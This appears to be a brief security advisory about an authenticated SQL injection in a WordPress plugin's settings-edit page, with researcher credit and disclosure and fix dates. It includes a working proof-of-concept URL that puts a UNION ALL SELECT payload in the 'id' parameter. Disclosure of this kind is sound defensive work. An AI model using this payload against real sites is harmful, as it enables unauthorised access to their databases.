The plugin does not sanitise or escape the id GET parameter before using it in a SQL statement, when retrieving the setting to edit in the admin dashboard, leading to an authenticated SQL Injection
https://example.com/wp-admin/admin.php?page=wpcui-manage-settings&action=edit&id=-7418+UNION+ALL+SELECT+NULL%2Ccurrent_user()%2Ccurrent_user()%2CNULL%2CNULL%2CNULL
Shreya Pohekar of Codevigilant Project
Yes
2021-12-27 (about 1 years ago)
2021-12-27 (about 1 years ago)
2022-04-16 (about 9 months ago)